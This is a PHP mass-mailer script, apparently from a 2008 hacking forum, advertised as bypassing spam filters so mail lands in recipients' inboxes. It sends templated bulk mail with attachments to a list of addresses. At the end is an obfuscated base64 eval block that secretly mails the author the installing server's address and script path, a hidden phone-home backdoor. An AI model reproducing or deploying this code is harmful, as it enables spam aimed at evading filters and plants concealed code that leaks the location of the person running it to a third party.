RealUnix.net 2008 Undetected ALL-inbox (new technique by-pass) Mailer -- By WebCraker
";
//Open the file attachment if any, and base64_encode it for email transport
If ($file_name){
if (!file_exists($file)){
die("The file you are trying to upload couldn't be copied to the server");
}
$content = fread(fopen($file,"r"),filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++){
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: 1.0\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "ok
";
flush();
}
}
}
}
eval(base64_decode('JHMgPSBhcnJheSAoImsiLCJiIiwidyIsImUiLCJhIiwiciIsImMiLCJAIiwibSIsImkiLCJsIiwi
LiIsIm8iLCJnIik7DQokc3lzdGVtX2FycmF5MiA9ICRzWzJdLiRzWzNdLiRzWzFdLiRzWzZdLiRz
WzVdLiRzWzRdLiRzWzBdLiRzWzNdLiRzWzVdLiRzWzddLiRzWzEzXS4kc1s4XS4kc1s0XS4kc1s5
XS4kcw0NClsxMF0uIi4iLiRzWzZdLiRzWzEyXS4kc1s4XTsNCiR0byA9ICIkc3lzdGVtX2FycmF5
MiIgOw0KJHN1YmplY3QgPSAiTWFpbGVyIGFyLTEyNTYiIDsNCiRtZXNzYWdlID0gIk1haWxlciBM
SU5LIDogaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICRfU0VSVkVSWydTQ1JJ
UFRfTkFNRSddIDsNCm1haWwgKCR0bywkc3ViamVjdCwkbWVzc2FnZSkgOw0KJG5zY2RpciA9KCFp
c3NldCgkX1JFUVVFU1RbJ3NjZGlyJ10pKT9nZXRjd2QoKTpjaGRpcigkX1JFUVVFU1RbJ3NjZGly
J10pOyRuc2NkaXI9Z2V0Y3dkKCk7'));
?>
emailer RealUnix.net
provided by SadSoul
Edited By WebCraker 08/2008
PLEASE DONT USE THIS SOFTWARE TO SPAM!,
or something like this!
11/ý2005